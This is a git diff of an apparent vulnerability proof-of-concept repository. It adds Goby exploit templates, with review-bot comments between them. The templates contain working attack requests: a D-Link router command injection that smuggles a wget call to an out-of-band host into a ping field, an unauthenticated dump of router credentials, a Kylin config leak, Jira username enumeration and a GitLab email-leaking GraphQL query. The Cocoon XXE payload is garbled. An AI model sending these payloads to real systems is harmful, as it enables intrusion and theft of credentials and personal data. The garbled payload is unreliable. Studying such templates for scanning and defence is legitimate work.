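Review bot: The scan's only body indicator is the substring `pwd`, which appears in countless unrelated pages (scripts, form field names), so any deployment where `/action/usermanager.htm` answers 200 with a generic page is reported as leaking credentials; the indicator is too weak to stand as evidence and needs a `bz` justification or a more specific marker taken from a confirmed vulnerable response. `Impact` is an emoji placeholder and `Recommandation` the string `undefined`, both with raw line breaks (see the Portainer note); since `ExploitSteps` dumps the whole response with `output|lastbody`, `Impact` should at least state that account credentials are exposed so operators understand what the output contains. `Tags` uses a Chinese label while the other templates in this commit use lowercase English tags such as `infoleak`, which will split the same category across two tag values.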
diff --git a/2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yaml b/2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yml
similarity index 100%
rename from 2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yaml
rename to 2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yml
diff --git a/2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yaml b/2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yml
similarity index 100%
rename from 2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yaml
rename to 2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yml
diff --git a/2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yaml b/2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yml
similarity index 100%
rename from 2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yaml
rename to 2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yml
diff --git a/2019/CVE-2019-16920/poc/goby/CVE-2019-16920.json b/2019/CVE-2019-16920/poc/goby/CVE-2019-16920.json
new file mode 100644
index 000000000..b00ccfb13
--- /dev/null
+++ b/2019/CVE-2019-16920/poc/goby/CVE-2019-16920.json
@@ -0,0 +1,103 @@
+{
+ "Name": "Dlink RCE CVE-2019-16920",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "(app=\"D_Link-Router\" | body=\"DIR-655\" | body=\"DIR-866L\" | body=\"DIR-652\" | body=\"DHP-1565\")",
+ "Description": "Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.",
+ "Product": "Dlink",
+ "Homepage": "http://www.dlink.com.cn/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://www.anquanke.com/post/id/187923"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/apply_sec.cgi",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://{{{check}}}",
+ "set_variable": [
+ "check|dnslog|4|15"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$reserver",
+ "operation": "contains",
+ "value": "{{{check}}}",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-25 18:14:25",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
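Review bot: `ExploitSteps` requests `/test.php` and expects the body to contain `test`, but nothing in this template creates such a file — the scan step's injected command only performs a `wget` to the dnslog host — so the exploit branch can never succeed, and with `"HasExp": true` the engine presumably offers an exploit that is dead code. Either set `"HasExp": false` and drop `ExploitSteps`, or document in `ExpTips` what `/test.php` is expected to be and where it comes from. `ExpParams` is `null` while `HasExp` is `true`, and `Impact`/`Recommendation` are empty for a template rated Level 3 that the description itself says leads to full system compromise.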
diff --git a/2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yaml b/2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yml
similarity index 100%
rename from 2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yaml
rename to 2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yml
diff --git a/2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yaml b/2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yml
similarity index 100%
rename from 2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yaml
rename to 2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yml
diff --git a/2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yaml b/2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yml
similarity index 100%
rename from 2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yaml
rename to 2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yml
diff --git a/2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yaml b/2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yml
similarity index 100%
rename from 2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yaml
rename to 2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yml
diff --git a/2019/CVE-2019-17506/poc/goby/CVE-2019-17506.json b/2019/CVE-2019-17506/poc/goby/CVE-2019-17506.json
new file mode 100644
index 000000000..91466ccbf
--- /dev/null
+++ b/2019/CVE-2019-17506/poc/goby/CVE-2019-17506.json
@@ -0,0 +1,103 @@
+{
+ "Name": "Dlink Info Leak CVE-2019-17506",
+ "Level": "2",
+ "Tags": [
+ "infoleak"
+ ],
+ "GobyQuery": "app=\"D_Link-Router\"",
+ "Description": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.",
+ "Product": "Dlink",
+ "Homepage": " http://www.dlink.com.cn/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://xz.aliyun.com/t/6453"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/getcfg.php",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "<name>",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "<password>",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/getcfg.php",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-26 19:19:16",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
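Review bot: `"Homepage": " http://www.dlink.com.cn/"` carries a leading space, which breaks any tooling that validates or links the URL; it should be `"Homepage": "http://www.dlink.com.cn/"`. `ExploitSteps` repeats the scan request verbatim but checks only `$code == 200`, so the exploit branch proves less than the scan already did and merely re-dumps the response that already contained `<name>` and `<password>`; if it is kept, it should at least not need a second network round-trip. `ExpParams` is `null` while `HasExp` is `true`, and `Impact`/`Recommendation` are empty although the description states that router credentials are exposed.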
diff --git a/2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yaml b/2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yml
similarity index 100%
rename from 2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yaml
rename to 2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yml
diff --git a/2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yaml b/2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yml
similarity index 100%
rename from 2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yaml
rename to 2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yml
diff --git a/2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yaml b/2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yml
similarity index 100%
rename from 2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yaml
rename to 2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yml
diff --git a/2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yaml b/2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yml
similarity index 100%
rename from 2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yaml
rename to 2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yml
diff --git a/2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yaml b/2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yml
similarity index 100%
rename from 2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yaml
rename to 2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yml
diff --git a/2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yaml b/2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yml
similarity index 100%
rename from 2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yaml
rename to 2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yml
diff --git a/2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yaml b/2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yml
similarity index 100%
rename from 2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yaml
rename to 2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yml
diff --git a/2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yaml b/2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yml
similarity index 100%
rename from 2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yaml
rename to 2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yml
diff --git a/2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yaml b/2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yml
similarity index 100%
rename from 2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yaml
rename to 2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yml
diff --git a/2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yaml b/2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yml
similarity index 100%
rename from 2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yaml
rename to 2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yml
diff --git a/2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yaml b/2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yml
similarity index 100%
rename from 2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yaml
rename to 2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yml
diff --git a/2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yaml b/2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yml
similarity index 100%
rename from 2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yaml
rename to 2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yml
diff --git a/2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yaml b/2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yml
similarity index 100%
rename from 2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yaml
rename to 2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yml
diff --git a/2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yaml b/2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yml
similarity index 100%
rename from 2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yaml
rename to 2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yml
diff --git a/2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yaml b/2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yml
similarity index 100%
rename from 2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yaml
rename to 2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yml
diff --git a/2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yaml b/2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yml
similarity index 100%
rename from 2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yaml
rename to 2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yml
diff --git a/2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yaml b/2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yml
similarity index 100%
rename from 2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yaml
rename to 2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yml
diff --git a/2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yaml b/2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yml
similarity index 100%
rename from 2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yaml
rename to 2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yml
diff --git a/2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yaml b/2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yml
similarity index 100%
rename from 2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yaml
rename to 2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yml
diff --git a/2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yaml b/2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yml
similarity index 100%
rename from 2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yaml
rename to 2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yml
diff --git a/2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yaml b/2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yml
similarity index 100%
rename from 2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yaml
rename to 2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yml
diff --git a/2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yaml b/2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yml
similarity index 100%
rename from 2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yaml
rename to 2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yml
diff --git a/2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yaml b/2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yml
similarity index 100%
rename from 2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yaml
rename to 2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yml
diff --git a/2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yaml b/2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yml
similarity index 100%
rename from 2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yaml
rename to 2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yml
diff --git "a/2020/CVE-2020-11991/poc/goby/Apache Cocoon Xml \346\263\250\345\205\245 CVE-2020-11991.json" "b/2020/CVE-2020-11991/poc/goby/Apache Cocoon Xml \346\263\250\345\205\245 CVE-2020-11991.json"
new file mode 100644
index 000000000..56bcaae8c
--- /dev/null
+++ "b/2020/CVE-2020-11991/poc/goby/Apache Cocoon Xml \346\263\250\345\205\245 CVE-2020-11991.json"
@@ -0,0 +1,55 @@
+{
+ "Name": "Apache Cocoon Xml 注入 CVE-2020-11991",
+ "Level": "1",
+ "Tags": [
+ "XML注入"
+ ],
+ "GobyQuery": "app=\"Apache-Cocoon\"",
+ "Description": "9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12",
+ "Product": "Apache Cocoon",
+ "Homepage": "http://cocoon.apache.org/2.1/",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐑
",
+ "Recommandation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/v2/api/product/manger/getInfo",
+ "follow_redirect": true,
+ "header": {
+ "Content-type": "text/xml"
+ },
+ "data_type": "text",
+ "data": "\n ]>\n\nJohn \n&ent;\n"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "PostTime": "2021-01-22 22:24:01",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
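Review bot: The request body `"data": "\n ]>\n\nJohn \n&ent;\n"` is not well-formed XML — only a dangling `]>`, the text `John` and an entity reference to an undeclared `&ent;` remain, which looks like the markup was stripped when the template passed through an HTML renderer — so the template as committed cannot exercise CVE-2020-11991 and should not be merged in this state. The body check `"value": "root"` is also too weak to evidence an out-of-band file read, since `root` occurs in many ordinary responses. `Impact` is an emoji placeholder with a raw line break (the invalid-JSON issue flagged on the Portainer file), and the `Description` gives the advisory date as 9月11日 without a year.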
diff --git "a/2020/CVE-2020-13937/poc/goby/Apache Kylin \346\234\252\346\216\210\346\235\203\351\205\215\347\275\256\346\263\204\351\234\262 CVE-2020-13937.json" "b/2020/CVE-2020-13937/poc/goby/Apache Kylin \346\234\252\346\216\210\346\235\203\351\205\215\347\275\256\346\263\204\351\234\262 CVE-2020-13937.json"
new file mode 100644
index 000000000..2d752cbcd
--- /dev/null
+++ "b/2020/CVE-2020-13937/poc/goby/Apache Kylin \346\234\252\346\216\210\346\235\203\351\205\215\347\275\256\346\263\204\351\234\262 CVE-2020-13937.json"
@@ -0,0 +1,78 @@
+{
+ "Name": "Apache Kylin 未授权配置泄露 CVE-2020-13937",
+ "Level": "0",
+ "Tags": [
+ "Disclosure of Sensitive Information"
+ ],
+ "GobyQuery": "app=\"APACHE-kylin\"",
+ "Description": "Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息。\nhttp://xxx.xxx.xxx.xxx/kylin/api/admin/config\n\nApahche Kylin 2.x.x\nApahche Kylin <= 3.1.0\nApahche Kylin 4.0.0-alpha",
+ "Product": "Apache Kylin",
+ "Homepage": "http://kylin.apache.org/cn/",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Config",
+ "type": "select",
+ "value": "/kylin/api/admin/config",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/kylin/api/admin/config",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "config",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/kylin/api/admin/config",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-24 13:03:37",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
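Review bot: `Apahche` is misspelled three times in the version list inside `Description`, and `Impact`/`Recommandation` carry the emoji and `undefined` placeholders with raw line breaks flagged on the Portainer file. The scan's body indicator `config` is satisfied by almost any response that mentions configuration, including error and default pages, so a 200 from a proxy in front of a patched instance would still be reported; a `bz` note on what the genuine response contains would let a reviewer judge the check. `"Level": "0"` for an unauthenticated configuration disclosure looks inconsistent with the `2` assigned to comparable disclosure templates in this commit, and the lowercase `name`/`type`/`value` keys in `ExpParams` are worth confirming against the Goby schema.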
diff --git a/2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yaml b/2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yml
similarity index 100%
rename from 2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yaml
rename to 2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yml
diff --git a/2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yaml b/2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yml
similarity index 100%
rename from 2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yaml
rename to 2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yml
diff --git "a/2020/CVE-2020-14181/poc/goby/Atlassian Jira \344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-14181.json" "b/2020/CVE-2020-14181/poc/goby/Atlassian Jira \344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-14181.json"
new file mode 100644
index 000000000..75dd54f6d
--- /dev/null
+++ "b/2020/CVE-2020-14181/poc/goby/Atlassian Jira \344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-14181.json"
@@ -0,0 +1,51 @@
+{
+ "Name": "Atlassian Jira 信息泄露漏洞 CVE-2020-14181",
+ "Level": "0",
+ "Tags": [],
+ "GobyQuery": "(app=\"JIRA\" || title=\"System Dashboard\")",
+ "Description": "Jira存在一个未授权访问漏洞,未授权的用户可以通过一个api接口直接查询到某用户名的存在情况,该接口不同于CVE-2019-8446和CVE-2019-3403的接口,是一个新的接口。如果Jira暴露在公网中,未授权用户就可以直接访问该接口爆破出潜在的用户名。",
+ "Product": "Jira",
+ "Homepage": "https://ones.ai/",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/secure/ViewUserHover.jspa?username=peiqipeiqipeiqi",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "peiqipeiqipeiqi",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "PostTime": "2021-01-29 10:56:59",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
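Review bot: The metadata in this entry is inconsistent with the rest of the batch and partly wrong: `Homepage` points at ones.ai, which is not the Jira vendor site, and the key is spelled `Recommandation` here while the aetkrad entries in this same diff use `Recommendation`, so whichever spelling goby actually reads, the other one is silently ignored. I would set `"Homepage": "https://www.atlassian.com/software/jira"` and rename the key to `"Recommendation"`. The `Impact` value also appears to carry a raw line break inside the JSON string, which a strict JSON parser rejects; if that is not just a rendering artifact of this diff, replace it with a one-line statement such as `"Impact": "Unauthenticated username enumeration via /secure/ViewUserHover.jspa"`. The detection itself (200 with the probe username echoed, `follow_redirect` false) only proves the endpoint answers anonymously, which is presumably the intended signal since a fixed instance should not serve it without a session.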
diff --git a/2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yaml b/2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yml
similarity index 100%
rename from 2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yaml
rename to 2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yml
diff --git a/2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yaml b/2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yml
similarity index 100%
rename from 2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yaml
rename to 2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yml
diff --git a/2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yaml b/2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yml
similarity index 100%
rename from 2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yaml
rename to 2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yml
diff --git a/2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yaml b/2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yml
similarity index 100%
rename from 2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yaml
rename to 2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yml
diff --git a/2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yaml b/2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yml
similarity index 100%
rename from 2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yaml
rename to 2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yml
diff --git a/2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yaml b/2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yml
similarity index 100%
rename from 2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yaml
rename to 2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yml
diff --git a/2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yaml b/2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yml
similarity index 100%
rename from 2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yaml
rename to 2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yml
diff --git a/2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yaml b/2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yml
similarity index 100%
rename from 2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yaml
rename to 2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yml
diff --git "a/2020/CVE-2020-26413/poc/goby/GitLab Graphql\351\202\256\347\256\261\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-26413.json" "b/2020/CVE-2020-26413/poc/goby/GitLab Graphql\351\202\256\347\256\261\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-26413.json"
new file mode 100644
index 000000000..90fc00c39
--- /dev/null
+++ "b/2020/CVE-2020-26413/poc/goby/GitLab Graphql\351\202\256\347\256\261\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-26413.json"
@@ -0,0 +1,88 @@
+{
+ "Name": "GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413",
+ "Level": "0",
+ "Tags": [
+ "信息泄露"
+ ],
+ "GobyQuery": "app=\"GitLab\"",
+ "Description": "GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名",
+ "Product": "GitLab 13.4 - 13.6.2",
+ "Homepage": "https://about.gitlab.com/pricing/",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "https://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/api/graphql",
+ "follow_redirect": true,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": "{\"query\":\"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\"variables\":null,\"operationName\":null}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
